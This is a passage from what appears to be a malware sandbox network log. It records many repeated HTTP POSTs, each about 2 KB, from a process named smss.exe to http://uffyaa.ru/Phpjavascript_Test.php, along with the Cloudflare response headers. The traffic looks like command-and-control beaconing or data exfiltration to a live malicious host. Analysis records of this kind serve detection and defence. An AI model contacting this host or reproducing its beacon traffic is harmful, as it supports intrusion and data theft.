                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53873&min_rtt=47954&rtt_var=6001&sent=278&recv=279&lost=0&retrans=8&sent_bytes=46956&recv_bytes=211549&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:43 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHGZZ0dpUxW68klj7K%2FVqzpzdx5rA2J41y33quOYd2b1FFNUHkRYXcEoYJO%2F%2FWdSitA5v5OkeyziGFsEVlfLn4fiG6CQVL4KMmzbLl8kUBwrtYeLOGHWUFePk38%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3610c3688a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53568&min_rtt=47954&rtt_var=3854&sent=282&recv=283&lost=0&retrans=8&sent_bytes=47936&recv_bytes=213884&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cIyL7k0RCQTbD7N9Bl7Uam%2B3cRURlCbeLX8mHQgTmEKN9%2F%2FGhF%2BN0d47VtHcdJP6gxvT2lUqwaD%2FFyakaofBt7CfpB%2Bi%2BNdKFgzjZBjfmjwESG%2BSf6%2FtCChtYhU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc368af6488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54869&min_rtt=47954&rtt_var=4161&sent=286&recv=287&lost=0&retrans=8&sent_bytes=48912&recv_bytes=216219&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:46 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=isUuWrMqBiJAnhRf6y3Oyr98ZPlGSCEhXGH0lRTn3G9fskHCYFwg%2F%2FmtFbFbzRW2d2beJ9%2F0v%2Ba3zNvW4NjxDkA%2BDHj5GZSuIdxGFKbNyXh5%2BIo97HgxAHfdpjM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3706ad288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55344&min_rtt=47954&rtt_var=5193&sent=290&recv=291&lost=0&retrans=8&sent_bytes=49900&recv_bytes=218554&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:47 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqS4WBcduyzgC0Fju8moxWZKYOTZ%2FwJ9t6rJ0aKQiPE%2F2TZOgm12bMWLbd2p%2F%2BwpxH0KI1F8yXtVXQXSPPlJwtDvSDGzHa4qGa%2B5vAi2DX4YAOgIVA34sEqY4po%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3784c9c88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55629&min_rtt=47954&rtt_var=4412&sent=294&recv=295&lost=0&retrans=8&sent_bytes=50882&recv_bytes=220889&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:48 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8%2F%2Frh7tNbQSsMY1%2FyXk6JXtYIYtJc0nGft1Y3xQwPmr%2B%2B86oNmWdFvvJp2umhIWCfB56KB4oPsB3KPXjveB7koT7jda1ZgTtGeAC7Htuh1sI8cG3llC95BOF5Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3800f1a88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54587&min_rtt=47859&rtt_var=3603&sent=298&recv=299&lost=0&retrans=8&sent_bytes=51862&recv_bytes=223224&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2076
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:49 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kqaPzitU4hCBNRc%2FygD6AUTad4Z%2BY3eQAyKBHZSRBOGoczkKrFreG0woIQGhxwlFoyR5BgfjBhT8X%2BKRdLPPUsSvSMtywJmmDtAwU5piPJygfIucFgN7dV%2F8XI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc387a9b888a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54959&min_rtt=47859&rtt_var=4041&sent=302&recv=303&lost=0&retrans=8&sent_bytes=52842&recv_bytes=225543&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:50 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRYi6EbAk8XSXRKdKdB4zDMEe40UAA5fzhsHWstTPHXR2YWmNc08rHBhJMpWnLj0xCoLkTVpGJlQ%2FpR%2F86%2FO37MUlKYuj82QhtrfPVY%2BLU95Qle8RO2fu0ajhK4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc38f5cf088a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54769&min_rtt=47859&rtt_var=3865&sent=306&recv=307&lost=0&retrans=8&sent_bytes=53820&recv_bytes=227878&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:52 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pxFZJcrHE4AjahE7O%2FhFYZyh7yJ9p2DYlQlK9B5%2BnBe4AkH1av6VSNn6JdEAPOLl3oDPeIx6YZ1AAqeDIYlHGG9x5TYtgdq9jHl8XS%2B3UL7izHJ%2BXn2XYEMGoGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc397297388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54664&min_rtt=47859&rtt_var=4458&sent=310&recv=311&lost=0&retrans=8&sent_bytes=54798&recv_bytes=230213&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:53 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJNGkW34izjUF1%2FHUc2GGbVs0x2GwobDoF0it0qcbyPJAvpqpwE%2BjTj7Kjh8d1niE8a3hz6LhQW8a10ObVvvIlJ8YsOhYjAmE197W7DOzhZpT%2F1C6IFY2A4leE8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc39edc1b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54800&min_rtt=47859&rtt_var=2758&sent=314&recv=315&lost=0&retrans=8&sent_bytes=55776&recv_bytes=232548&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:54 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evEbUQpTpqQhFIqifqBVftEgrZXLpMeri2gCNNF2QkrPTmSVQE4V2%2FlQTwK4yDpnx6FKHhFLn6XFzaKMrj2Rn8IvIYUoxXhhfxhQvvCu%2FBKyPJmNNsivf1695bA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3a74ff888a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55790&min_rtt=47859&rtt_var=3277&sent=318&recv=319&lost=0&retrans=8&sent_bytes=56752&recv_bytes=234883&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2064
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:56 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jgi6Fwsf8CZ9h0yxviKvyRBaZ41CaRT2PrTqnt%2BRc6Z7jh1uYYZEEUkCIFo84%2FOLaf5G2NW6D%2Btfx5dr%2BJWJyQmEBSrNsWkUH9aiOSuOxDG%2BkM%2FZDTQpnyNJK5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3af4b0188a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=56609&min_rtt=47859&rtt_var=3211&sent=322&recv=323&lost=0&retrans=8&sent_bytes=57726&recv_bytes=237190&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:57 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2BFB7n5J7OLEuchOZGyXnDk72c394ow%2B9DpDqoP7XPwzFXMT75pgm5CVnuVaYS%2FKMan%2Fo5rlFkYZKfHkLTNuEKf9NqVxBiaJ1kD6rxW%2BbxaN07hqLGBErcrY4qg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3b6eda388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55979&min_rtt=47859&rtt_var=2783&sent=326&recv=327&lost=0&retrans=8&sent_bytes=58708&recv_bytes=239525&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:58 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rK6SMWDVUwV1Fkt%2BZYMkou7JWhur%2F6r3jQDkll3xXJxc6F0gcKOL1phEMDxaaY3taaq1CLf6S8pdY0b%2B0BlvrOA18w%2B2TFyckOiYk1y9hM8If8eYg9n7YnqgXKE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3bea8e388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54505&min_rtt=47859&rtt_var=2974&sent=330&recv=331&lost=0&retrans=8&sent_bytes=59688&recv_bytes=241860&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:59 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tqWSSpJ7QPa5jOK4bUStdo6VmUsjo7pyxEwarIR7iNAXPH4NLlrhWpkc4QgsAJ%2FSljPI%2B2I2v5XkmRamH5NMKzerYNiyo7gC26wPjsXteUaFaxBhr61X9XEm90%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3c68bda88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54216&min_rtt=47859&rtt_var=2612&sent=334&recv=335&lost=0&retrans=8&sent_bytes=60666&recv_bytes=244195&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:00 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ufldWRgYzlUbTeb7IpAFQAb4hu6BnUgek%2B4x8EpypIHSZi1ZdlFCtx2mEEZVx%2Bj2eVEzn1T91LiWP8pHVMM9i2tjiS%2BGWla9A5mgzrcpnMmlTosilGOGWl42sQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3ce2ee288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53587&min_rtt=47859&rtt_var=2110&sent=338&recv=339&lost=0&retrans=8&sent_bytes=61640&recv_bytes=246530&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:02 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SjT%2BuXRw3oZGwFci8dRIRJJh90Mrv6i2Oe3VPcVIOcHP3OckJ60UdPKTsYNsJQlVlElupgZ9c5ox8YrJPOyvul2o20xrDCRrDUb%2BL%2BSzVh6PeZExmZTP0iLskQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3d5cac288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53426&min_rtt=47859&rtt_var=1956&sent=342&recv=343&lost=0&retrans=8&sent_bytes=62616&recv_bytes=248865&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:03 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
